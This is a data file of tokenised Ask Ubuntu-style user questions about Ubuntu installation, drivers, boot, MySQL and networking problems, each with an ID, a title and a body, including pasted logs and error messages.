379657	unable to install softwares or update ubuntu12.04 lts due to root password	i am unable to update ubuntu 12.04 lts due to root password . i have set a password for admin during installing ubuntu but after that i had changed my admin account to standard account . after changed to standard account without any password . on installing any software or updation it asked for root password . on typing root password , it shows wrong password . and unable to authenticate my password . is my root password which i set during installing ubuntu is changed ?
379659	on 13.10 , wifi gets detected but unable to connect	i am running ubuntu 13.10 , my system detects wifi but i 'm unable to connect . i am getting this error message : r [ 736 ] : ( wlan0 ) : supplicant interface state : authenticating - > disconnected r [ 736 ] : ( wlan0 ) : supplicant interface state : disconnected - > scanning 4.472788 ] ieee80211 phy0 : rt2x00queue_write_tx_frame : error - arrived at non-free entry in the non-full queue 0 4.472788 ] please file bug report to http : //rt2x00.serialmonkey.com how can i fix this ? with the below reply by pushpreet , wifi is working , but still bluetooth never works , any suggestions ?
379660	random warnings at startup	when i reboot the system , sometimes i get the warning messages saying system problem detected . when this happens , except this apport message , entire screen goes blank and after some time , session starts as usual . weird part is that this happens randomly and not during every reboot . below is /etc/rc.local # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . sleep 10 rfkill block bluetooth sudo mount /dev/sda2 /media/nitish thunderbird & exit 0 thunderbird when executed through terminal gives these errors ( process:2462 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed ( thunderbird:2462 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :sm-connect after class was initialised ( thunderbird:2462 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :show-crash-dialog after class was initialised ( thunderbird:2462 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :display after class was initialised ( thunderbird:2462 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :default-icon after class was initialised [ calbackendloader ] using libical backend at /usr/lib/thunderbird/extensions/ { e2fda1a4-762b-4020-b5ad-a41df1933103 } /components/libical.manifest and then starts normally . does this cause any problem ? even then , why does this problem not occur every time i reboot ?
379662	installation but failure to boot	after successfully installing 13.x and receiving the `` you must restart your computer '' message then on reboot all i am able to get is the rose colored screen !
379665	how do i boot up ubuntu on windows 8 from a linux usb key ?	i did all of the steps on creating a special linux usb key with ubuntu on it , but how do i boot up ubuntu ? i was told that i plug in the usb into my computer before i start it up , it will go directly to ubuntu , and when i unplug it after shutdown and start it up again it would go back to windows 8 . it does nothing just goes to windows 8 . i 'm completely new to windows 8 ( literally got it today ) so is it possible to use it like i said ? if so how ? thanks
379667	installing nvidia 770 on ubuntu 13.10	i ca n't get my brand new nvidia 770 working on my ubuntu 13.10 , i had it working perfectly on my 13.04 until my hdd crashed . now it wont work under my 13.04 livecd or when i upgrade to 13.10 . i need to connect it to my built in intel hd4000 how do i get the drivers to have the correct resolution , when i use it on my hisense monitor . and how do i safely and properly install my nvidia drivers , because each time it fails so i reformat the hdd and try again . thank you so much guys .
379668	x server crashes when i start firefox from chroot	i thought to start an isolated firefox instance in a chroot , but it always crashes my x server . i tried with different chroot environments ( raring , trusty ) , and tried schroot and plain chroot too . /proc , /sys , /dev , /dev/pts are bind-mounted into the chroot jail , as it is done automatically by schroot . i have no idea what may cause this . when it happens , the x server restarts and i get back to the unity login prompt , and when i log in again , ubuntu asks me to send 3 crash reports . the command i use to start firefox is : display=:0 firefox &
379672	how do i use my ps3 wireless keyboard in ubunto 12.04 ?	i have tried right clicking the bluetooth icon and going to set up new device . the keyboard is in the list of devices but when i attempt to pair , i type the pin but nothing seems to happen . then the connection times out . i also tried the same thing with blueman but , same thing , ca n't pair . any help ?
379674	is there any way to get a mysql database from a /var backup ?	i upgraded from ubuntu 12.10 to ubuntu 13.10 . after some time , i found that i did n't export all my mysql databases . some of them are missing . i still have a backup from my /var/ partition , but i can not just copy the missing databases ( directories ) over from /var/lib/mysql/ , it will not work . mysql-daemon will fail to restart . i can not replace the entire current /var/lib/mysql/ with the backed-up one either , just so i could export the missing tables and move the new directory back and import the exported tables . the databases and tables did show up in phpmyadmin , but all the content was empty . the annoying thing is , the daemon will fail to restart after fiddling around quickly . mysql has turned * into a sensitive little girl . when i move an exact copy of my ( new , untouched and post-upgrade ) mysql directory back , it still wo n't restart and i have to apt-get install mysql-server-5.5 -- reinstall for it to work agian . so , is there any way i can get a database back from backed up files ? they are sitting there so conveniently , named exactly like the database , with files named exactly like the tables . * ) this used to work . normally i export my stuff , so last time i did this was a few years back , but it used to work . now mysql acts like a crybaby . new is not always better . at least mongodb just eats whatever files you put in /var/lib/mongodb as long as it 's proper bson . although the error log is very verbose , it does n't really help me . a hundred of these : 131120 5:23:48 [ error ] can not find or open table some_database/some_table from the internal data dictionary of innodb though the .frm file for the table exists . maybe you have deleted and recreated innodb data files but have forgotten to delete the corresponding .frm files of innodb tables , or you have moved .frm files to another database ? or , the table contains indexes that this version of the engine does n't support . see http : //dev.mysql.com/doc/refman/5.5/en/innodb-troubleshooting.html how you can resolve the problem . and some other messages about innodb that i can not reproduce because i accidentally refreshed the log in my editor while reinstalling mysql for the n-th time . what is this innodb stuff anyway ? it 's like the weak little crybaby brother or sister of the grown and versatile mysql . they made it the default in server 5.5 . probably with good reason , but so far it did n't make me any sandwiches .
379676	i am unable to mount my hard drives in ubuntu 12.10 ( i also have window 7 in dual boot )	i am unable to mount my all hard drives ( partitions ) which i have made in window 7 ( ultimate ) error- adding read acl for uid 1000 to '/media/sudd'failed : operation not supported
379677	how to quickly open an application in lubuntu ?	i just switched from ubuntu , where i can hit the super key and search for any application i want and just hit enter . in lubuntu there does n't seem to be a convenient way to quickly open an app in such manner ?
379679	matlab keeps asking for activation	i 'm having the exact problem this fellow is having in this thread : matlab does n't launch , keeps asking for activation i 've installed matlab successfully . however , i 'm having trouble activating the software . what will happen is i 'll type in cd /usr/local/matlab/r2013b/bin sudo ./matlab then a screen will pop up , where i 'll have to follow the activating procedure . first i chose online activation . after typing my login information and activation key , it says that matlab has been successfully activated . i 'll start matlab again , but now i have to walk through the whole activation process once again . this time i chose offline mode , where i have to download a license key and direct the program to its location . it says matlab has been successfully activated . when i start matlab once more , it walks me through the activation process again . has anyone encountered and conquered this broken record machine ? thanks !
379681	how do i install australis ( firefox nightly ) on 64-bit ubuntu ?	i 've seen opinions on australis here : anyone try australis yet ? ( new firefox ui ) . how can i install it on 64-bit ubuntu ? is there a ppa ? âubuntu mozilla daily build teamâ team has builds for aurora ( currently firefox 27 ) but i could n't find a ppa for firefox 28 nightly builds .
379682	after fiddling with automount and samba share i get this error	e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_binary-amd64_packages , e : the package lists or status file could not be parsed or opened .
379686	how to create a root privilege file for a normal user ?	i got a scenario where a customized ubuntu 12.04 linux os has a read only filesystem which does n't have terminal access . my goal is to create a file with root access using normal users permission . i got few configuration directories which have 777 permission as normal user `` not as sudo '' . i would like to know if there is any exploit or alternate way to setuid 0 to a file from the normal user ? i ca n't do grub related stuff to the root system because grub timeout is 0 .
379687	how can i import itunes playcount and ratings to rhytmbox ?	i want my entire itunes library in rhuthmbox so i just set its location to itunes library.but the ratings and playcounts were gone.is there a way to get these ratings and playcounts .
379689	i find a advanced video editor for ubuntu	i need a video editor which has the next functions : move the video ( like move tool on gimp ) resize the video ( like scale tool on gimp ) rotate the video ( like rotate tool on gimp ) and color combination like this :
379694	upgrading xampp from one version to another version in ubuntu	i am using ubuntu . i have xampp version of 1.7.3a , and i want to upgrade to xampp version 1.8.1 . is that possible to upgrade or should i download a newer version of xampp and install it ? if i install a newer version , will my phpmyadmin db get replaced with a new one or will it be there ? ? any ideas ? thanks in advance .
379695	how to clear server or network share connection history in ubuntu 13.04 ?	how do i can delete connection url present in file > connect to server . for security reasons i want to remove all that connection urls to which i have connected .
379696	issues after installing ubuntu 12.04 in dell vostro 3500	i 've installed ubuntu 12.04 in dell vostro 3500 laptop , sound in not audible from speakers but audible in headphones . previously windows 8 was installed at that time , one of the speaker is not working . is may both speakers are failed now or is the issue with drivers , how to confirm this ? bluetooth is also not functioning is any drivers missing for this also ? and read from documents found in internet that , ubuntu consumes more power than windows , is battery life decreases by using ubuntu ?
379698	why i always missing mysqlid.sockfile ?	i repeatedly missed mysqlid.sock file in ubuntu how can i generate this missed file , why this file always missing in ubuntu ? the error is ca n't connect through var/run/mysql/mysqlid.sock ( 2 ) because of this my software is not working .
379699	update manager bug	this is what i get when i try to open update- manager . please help . thank you please report this bug for the 'update-manager ' package and try to include the following error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/cn.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened .
379704	how to wisely partition a 2tb hdd ?	well i have some doubts about how to assign partitions on my hdds and ssd . i 'll explain my setup and how do i plan to use it and you can give me advices . i have a 120gb ssd where i have windows 7 and some other software . currently it has 20gb or so of free space . i also have a seagate 2tb hdd which i use only for storage and backups . and i also have a wd 2tb hdd which is nearly empty because i purhcased it not long ago . 16gb of ram my plan is : destinate 500gb out of 2tb on the wd hdd to ubuntu itself , that means `` / '' , `` /home '' and `` /swapp '' but i do n't know how to distribute those 500gb in the different partitions , and i do n't know if 500gb is way too much . thanx in advance .
379705	can i run ubuntu without loading it to a harddrive ?	can i run ubuntu from cd or a memory stick ?
379710	ca n't install teamviewer in ubuntu13.04 amd64 i386	problem , dpkg : error processing teamviewer_linux_x64.deb ( -- install ) : package architecture ( amd64 ) does not match system ( i386 ) errors were encountered while processing : teamviewer_linux_x64.deb
379713	no bluetooth adapter found on ubuntu 13.04	i have tries almost everything but could not switch on bluetooth and finally got to know bluetooth adapter is not installed on my dell inspiron n5010.. what i did.. bios check - checked bios and bluetooth is already enabled . on windows - i switched it on and used to see if its a hardware issue , but its working on windows . bluetooth manager - installed it but did not worked out . useful information to get my issue .. result of rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no result of lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 12:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 13:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 )
379714	error backports install ath9k using 12.04 lts	make clean make below error after make install command ( kernel ver . 3.8.0.33-generic ) let me know what the problem . root @ msis1 : /home/msis_park/downloads/backports-3.12-1 # make install building modules , stage 2 . modpost 36 modules install /home/msis_park/downloads/backports-3.12-1/compat/compat.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/compat/cordic.k ca n't read private key install /home/msis_park/downloads/backports-3.12-1/compat/crc8.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/compat/sch_codel.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/compat/sch_fq_codel.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/media/common /cypress_firmware.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/media/media.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/media/parport/bw-qcam.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/media/parport/c-qcam.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/media/parport/pms.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/media/parport/w9966.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/media/v4l2-core/v4l2- common.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/media/v4l2-core/v4l2-dv-timings.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/media/v4l2-core/videobuf2-core.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/media/v4l2-core/videobuf2-memops.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/media/v4l2-core/videobuf2-vmalloc.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/media/v4l2-core/videodev.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/ethernet/atheros/alx/alx.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/ethernet/atheros/atl1c/atl1c.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/ethernet/atheros/atl1e /atl1e.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/ethernet/atheros/atlx/atl1.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/ethernet/atheros/atlx/atl2.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/wireless/ath/ath.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/wireless/ath/ath5k/ath5k.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/wireless/ath/ath6kl/ath6kl_core.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/wireless/ath/ath6kl/ath6kl_sdio.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/wireless/ath/ath6kl/ath6kl_usb.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/wireless/ath/ath9k/ath9k.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/wireless/ath/ath9k/ath9k_common.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/wireless/ath/ath9k/ath9k_htc.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/wireless/ath/ath9k/ath9k_hw.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/wireless/ath/carl9170/carl9170.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/wireless/libertas_tf/libertas_tf.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/drivers/net/wireless/mac80211_hwsim.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/net/mac80211/mac80211.ko ca n't read private key install /home/msis_park/downloads/backports-3.12-1/net/wireless/cfg80211.ko ca n't read private key depmod 3.8.0-33-generic depmod will prefer updates/ over kernel/ -- ok ! note : you may or may not need to update your initramfs , you should if any of the modules installed are part of your initramfs . to add support for your distribution to do this automatically send a patch against `` update-initramfs.sh '' . if your distribution does not require this send a patch with the '/usr/bin/lsb_release -i -s' ( `` ubuntu '' ) tag for your distribution to avoid this warning . your backported driver modules should be installed now . reboot .
379720	forms not working properly	i am website designer . i created an input text box through blue fish html editor . but when i previewed in firefox it is showing overlapped to next column . but in windows same browser is showing correctly . i am using lower version of firefox in windows . in other browsers like google chrome , safari , opera etc its alignment is not properly showing compared to that in windows . i connected a microphone on my system but it is not working but in windows it is working well . please give me a solution for this . regards , roney wilson c
379722	installing ubuntu server 12.04.3 using raid 1 , need a step by step guide	lately , i am trying to build a server that uses ubuntu server 12.04.3 ( 64bit ) . i am facing problem while wanting to install under a software raid ( raid 1 ) . my server spec are as below : proccesor : intel i5-4670 motherboardďź asus h87m-e v1 ram : 2x 4gb 1600mhz hardisk : 2x 2tb wd red cavier i already tried either software raid and hardware raid . software raid ca n't install bootloader and hardware raid wo n't let me partition . this is my first time directly doing raid 1 on the os hdd . kind of newbie here . anyone who had this experience please share . thank you
379724	is there a game studio for linux	i 've been looking for some time now for a good game studio . to make xbox and ps4 type games . does some one know of some software that would work ?
379728	cross compiling , library gmp not found	i 'm trying to cross compile strongswan package on ubuntu for synology nas using official synology toolchain . host : hostname = ubuntu uname -m = i686 uname -r = 3.8.0-32-generic uname -s = linux target : synology : - model ds213+ - cpu : freescale qoriq p1022 - arch : powerpc - endianness : big endian - linux 2.6.32 - uname -a : linux lupodiskstation 2.6.32.12 # 3776 smp sat aug 17 02:11:24 cst 2013 ppc gnu/linux synology_qoriq_213+ when i run ./configure , i get error : configure : error : gnu multi precision library gmp not found configure command : env cc=/usr/local/powerpc-none-linux-gnuspe/bin/powerpc-none-linux-gnuspe-gcc \ ld=/usr/local/powerpc-none-linux-gnuspe/bin/powerpc-none-linux-gnuspe-ld \ ranlib=/usr/local/powerpc-none-linux-gnuspe/bin/powerpc-none-linux-gnuspe-ranlib \ cflags= '' -i/usr/local/powerpc-none-linux-gnuspe/include -mcpu=8548 -mhard-float -mfloat-gprs=double '' \ ldflags= '' -l/usr/local/powerpc-none-linux-gnuspe/lib '' \ ./configure \ -- host=powerpc-unknown-linux \ -- target=powerpc-unknown-linux \ -- build=i686-pc-linux \ -- prefix=/usr/local if i run ./configure without extra parameters ( with ubuntu gcc ) , i get no errors . i can also successfully compile helloworld.c with synology toolchain . i 've following gmp packages installed : dpkg -- get-selections | grep gmp gmpc install gmpc-data install gmpc-dev install libgmp-dev install libgmp10 install libgmp3-dev install libgmp3c2 install libgmpada2 install libgmpxx4ldbl install header file is under /usr/include/gmp.h . any idea how to include that gmp.h ?
379731	12.04 is lagging	my machine has been running 12.04 for over a year now . hardware wise , 4gb ram , 2nd gen core i3 . there is no dedicated graphics card . my machine is on a dual boot with windows 7 ( though it 's been ages since i 've used it ) , however i did not install ubuntu using the windows installer , i created a custom 50 gb partition and installed ubuntu on that . out of that 14.5 gb of free space is available . some of the issues that i 'm noticing are : increased boot time . compared to the boot time of a fresh install , this is out of the roof , while i do understand that it increases over a period of time , but currently it 's quite a lot upon resuming from stand by , there are times when the icons are frozen , they respond only to the extent of changing color , for example when you roll your mouse over the close , minimize , maximize options , they get highlighted , but they do n't work . sometimes the keyboard refuses to take any command which is an issue given how it 's necessary to enter a password to login to the system . docky has been installed on my machine , sometimes upon resuming from stand by , it can not be seen there is a visible lag while saving files . earlier , they 'd be done in a moment , now there is a distinct gap . i 'm not saying it 's much , but there is a lag nevertheless . these are some of the pertinent issues i 've been facing , any ideas regarding how this can be solved ?
379732	ubuntu installation failed on nexus 7 ( 2012 ) wifi	i follow instruction from here here some note during installation are : adb push /path/to/your/downloaded/saucy-preinstalled-touch-armel+grouper.zip /sdcard/autodeploy.zip there was no output from screen ( this will install the file you copied in the previous step ) again , no output that show installation progress adb push /path/to/your/downloaded/saucy-preinstalled-touch-armhf.zip /sdcard/autodeploy.zip still no ouput from screen ( this will install the file you copied in the previous step ) yes , no output sometimes after push command i try to check the file by using adb shell ls command , the autodeploy.zip was missing after reboot . i assume that file was proceed by system . now , my nexus 7 wifi only show google with unlock icon . any body can help me ? thanks note : win7 pro 64bit rom android 4.4 stock adb version 1.0.31 downloaded file : trusty-preinstalled-boot-armhf+grouper.img trusty-preinstalled-recovery-armel+grouper.img trusty-preinstalled-system-armel+grouper.img trusty-preinstalled-touch-armel+grouper.zip trusty-preinstalled-touch-armhf.zip
379733	minimal ubuntu elementary os port	can anyone help in creating a ubuntu with the following packages . desktop environment : pantheon gtk theme : egtk icon theme : moka icon theme terminal : pantheon-terminal settings : switchboard file manager : marlin/pantheon-files or in short the same apps are available in elementary os luna but the base is ubuntu 12.04 which is very old . can anyone port elementary os luna to ubuntu 13.10 or ubuntu 14.04
379734	errors found doing diskcheck	i would like to have a dual boot with ubuntu and win8 ( preinstalled ) . i 've downloaded ubuntu 13.10 ( an iso file ) and made a bootable usb stick ( 3,8 gb ) using pendrivelinux 's uui . when i booted it i ran the `` check disk for errors '' ( which is an option amongst `` try ubuntu before installing '' and `` install ubuntu '' ) . the check found two errors ( it did not specify what kind of errors ) . i 've tried several times making the bootable stick over again using another iso file that i downloaded ( in case there was something wrong with the image ) and then run the check over again . every time there is found two errors . i 've also tried remaking the bootable stick with ubuntu 12.04.3 lts but then there were found 3 errors . i 've not tried installing being afraid something might go wrong . any ideas what might cause the errors ?
379740	how to logout from terminal in 13.10 ?	i have seen some previous post about logout from terminal but those were for old versions . i didnt find the way for logout in ubuntu 13.10 from terminal . how can i logout from terminal in ubuntu 13.10 ?
379744	the cpu has been disabled by the guest operating system for ubuntu guest os	i have 3 virtual machines ( ubuntu 12.04 lts 32 bit ) . i copied these into another machine . and then i run . that point the cpu has been disabled by the guest operating system error occurs and i ca n't go forward . i restart and power off again but same error occurs . how to fix it ? ps : the previous machine is intel core2 duo dell machine host os is windows 7 . the destination machine is also windows 7 and lenovo core i5 . i use vmware workstations 6.5 in both laptops . all are 32 bit .
379745	xubuntu 13.04 hdmi sound problem	i am having an issue with hdmi audio output with xubuntu 13.04 . i did a clean install , downloaded updates after installation , am currently on kernel 3.8.0-33-generic . i have checked , and reloaded alsamixer and pulseaudio . the pulseaudio shows that there is an output signal for hdmi but i have no sound . i can not find any other helpful info . i am new to xubuntu , is there anything that i have missed ? my desktop had an amd a6 3620 apu .
379746	need help setting up modem zte mf667 on ubuntu 12.04	i 've got no internet connection , the computer do not recognize the modem .
379750	setup gitlab ci	i have setup gitlab in ubuntu server , it 's working fine . i access gitlab by url http : //123.456.789.100 and gitlab login details username : admin @ local.host password:123456 then i wanted to set gitlab ci for test the code before it merge . i have done with setting gitlab ci by using the link . i have done setting up every thing except runners . while set ssh git @ < your gitlab url > in runner i face error ssh git @ 123.456.789.100 it prompts me for password git @ 123.456.789.100 's password : i entered password ( 123456 ) of gitlab 's that i used to enter into gitlab server , then i have this error permission denied please try again but i got gitlab ci web interface by http : //123.456.789.100:8081 ( i did set gitlab-ci to listen on 8081 port ) . then i entered gitlab server 's username and password as admin @ local.host and 123456 , i got invalid credentials . what would be the wrong i made ? i am able to login gitlab_ci by gitlab 's username and password . all i need to do is add url of gitlab server in /home/gitlab_ci/config/application.yml file and select that gitlab server 's url in gitlab_ci webui . but i still getting error while do ssh git @ 123.456.789.100 on gitlab_ci runner
379754	stop software center from asking me to log in ubuntu one	since i upgraded to 13.10 , every time i open software center , i 'm asked to login to ubuntu one . i do n't have an account and am not interested in opening one . is it possible to stop software center from asking me to login ubuntu one ?
379756	command line syntax that will show mysql details	is there a command-line syntax that will show details about my installed mysql ( eg . ports , config file paths , etc . ) ?
379759	how to get the database details and mail configuration file in ubuntu 12.04.2 lts ?	i am new to ubuntu 12.04.2 lts.i need to get the database details and mail configuration file & where we install the files & locations of file paths in ubuntu 12.04.2 lts.for my question i need what are the commands and procedure for that.please find it and let me know ...
379761	monitor disk usage changes to infer download speed	i 'm testing various solutions for downloading large datasets , downloads which can take weeks and require several restarts . instead of monitoring network speed , i 'd like to use the change in disk usage to infer download speeds , since this will avoid measuring re-transmission of failed transfers . is there a tool to do this , or should i roll my own bash solution ?
379766	does installing modemmanager need the x window to be present ?	hello i planned to install a vodafone k3770 3g modem dongle on a ubuntu server 12.04.2 system , and from what i have gathered online via google etc . this modemmanager or the usb-modeswitch-data or usb-modeswitch are what i need , at least i can use the wvdial to connect but i need the machine to know that it 's a modem and not a simple usb flash drive . kindly confirm which one exactly i should need because on the gui network-manager handles this automatically . thank you
379769	login screen on the wrong monitor	i have an external monitor plugged to my laptop . i mostly use my laptop screen and use the external as a secondary monitor , sometimes not even turning it on . when i start the computer , the login screen is always on the external monitor . i need it to be on the main laptop screen . as a side note , in `` displays '' my secondary appears as `` unknown '' and has a very low resolution . but that would be for a different question here ...
379770	i want to boot ubuntu-12.04 with usb	i am using ubuntu-9.04.i want to install the new version of ubuntu . so i download the new version and insert it in the usb by using startup disk creator but when i go to boot it from usb it shows : 'syslinux 3.63 ... ... ... ..unknown keyword in configuration file boot : _ ' what should i do ?
379771	two-factor authentication on ubuntu one	is there a way to enable two-factor authentication to access my ubuntu one account ?
379777	make all error while installing htk	i am getting error in make all while installing htk : ( cd htklib & & make htklib.a ) \ || case `` '' in *k* ) fail=yes ; ; * ) exit 1 ; ; esac ; make [ 1 ] : entering directory `/home/dushyant/htk/htk/htklib' gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hgraf.o hgraf.c in file included from /usr/include/stdio.h:28:0 , from hshell.h:40 , from hgraf.c:54 : /usr/include/features.h:324:26 : fatal error : bits/predefs.h : no such file or directory compilation terminated . make [ 1 ] : *** [ hgraf.o ] error 1 make [ 1 ] : leaving directory `/home/dushyant/htk/htk/htklib' make : *** [ htklib/htklib.a ] error 1 what should i do ?
379779	restore my system to factory settings	i have sony vaio with windows 7 pre installed . i have installed the ubuntu in other partition to work as dual boot . i am trying now to restore the factory settings with alt + f10 which is not working any more . each time its giving me screen to choose operating system . how do i restore my system now ?
379781	what is device descriptor read/64 , error -110	boot is very slow since few weeks - ubuntu 12.04 - 3.8.x-x kernel but same slow down with 3.2.x-x - old pc compaq amd athlon ( tm ) 64 processor 3700+ cat /var/log/dmesg [ 2.127297 ] sr 4:0:0:0 : attached scsi cd-rom sr1 [ 2.127462 ] sr 4:0:0:0 : attached scsi generic sg3 type 5 [ 16.280033 ] usb 1-2 : device descriptor read/64 , error -110 [ 31.496031 ] usb 1-2 : device descriptor read/64 , error -110 [ 31.712031 ] usb 1-2 : new high-speed usb device number 3 using ehci-pci [ 46.824033 ] usb 1-2 : device descriptor read/64 , error -110 [ 62.040030 ] usb 1-2 : device descriptor read/64 , error -110 [ 62.256030 ] usb 1-2 : new high-speed usb device number 4 using ehci-pci [ 72.664032 ] usb 1-2 : device not accepting address 4 , error -110 [ 72.776030 ] usb 1-2 : new high-speed usb device number 5 using ehci-pci [ 83.184025 ] usb 1-2 : device not accepting address 5 , error -110 [ 83.184036 ] hub 1-0:1.0 : unable to enumerate usb device on port 2 as you can see it seems to stay long on each usb port ( ? ) i did not change any hardware into my computer . as my wifi connexion goes through usb dongle , it 's been twice slower since those errors appear , and sometimes no connexion at all . what do you think ?
379783	trying to install ubuntu 12.04 from usb but when booting it shows unknown keyword in 'syslinux configuration file .	i am using ubuntu 9.04 and i want to install newest version ( ubuntu 12.04 ) . using start-up disk creator i prepared ubuntu iso and saved it into usb but when i boot it it shows an error : 'syslinux 3.63 debian-2008-07-15 ebios copyright ( c ) 1994-2008 h. peter unknown keyword in configuration file boot : note : i 've already tried to open usb drive and open 'syslinux ' and delete 'ui ' in it .
379784	program to repair grub ?	i have had windows eight and ubuntu 13.04 dual booting and working fine ( using easybcd ) i had created partition for ubuntu of exactly 20gb . some time later , after never using ubuntu , i went into window 's partition tool and deleted my ubuntu partition . it said it erased everything on it . i then added this 20gb onto my hardrive/windows8 partition . i also deleted easy bcd . everything was going fine . i turned the computer off that night and this morning it said 'windows failed to start . a recent hardware or software change might be the cause' file : \nstautoneogrub1.mbr status : 0xc000000fi i re-installed ubuntu from a usb and all my data and windows system files are there , but i am stuck running ubuntu . i believe all i need to do is find the 'windows8.exe ' file and boot from that . can someone please help here ? my error report for boot-repair is : http : //paste.ubuntu.com/6426199/ also i tried updating grub using : - sudo update-grub , but : generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.0-13-generic found initrd image : /boot/initrd.img-3.11.0-13-generic found linux image : /boot/vmlinuz-3.11.0-12-generic found initrd image : /boot/initrd.img-3.11.0-12-generic found memtest86+ image : /boot/memtest86+.bin found windows 8 ( loader ) on /dev/sda1 found windows 7 ( loader ) on /dev/sda2 adding aptosid 2010-02-keres-kde-lite-amd64-201009132215 on /dev/sda5 proc sysfs none none none none udev devpts tmpfs none none none none systemd gvfsd-fuse gvfsd-fuse /dev/sda2 aptosid 2010-02-keres-kde-lite-amd64-201009132215 on /dev/sda5 proc sysfs none none none none udev devpts tmpfs none none none none systemd gvfsd-fuse gvfsd-fuse /dev/sda2 aptosid 2010-02-keres-kde-lite-amd64-201009132215 on /dev/sda5 proc sysfs none none none none udev devpts tmpfs none none none none systemd gvfsd-fuse gvfsd-fuse /dev/sda2 aptosid 2010-02-keres-kde-lite-amd64-201009132215 on /dev/sda5 proc sysfs none none none none udev devpts tmpfs none none none none systemd gvfsd-fuse gvfsd-fuse /dev/sda2 error : syntax error . error : incorrect command . error : syntax error . syntax error at line 296 syntax errors are detected in generated grub config file . ensure that there are no errors in /etc/default/grub and /etc/grub.d/* files or please file a bug report with /boot/grub/grub.cfg.new file attached.done my grub file is : if you change this file , run 'update-grub ' afterwards to update /boot/grub/grub.cfg . for full documentation of the options in this file , see : info -f grub -n 'simple configuration' 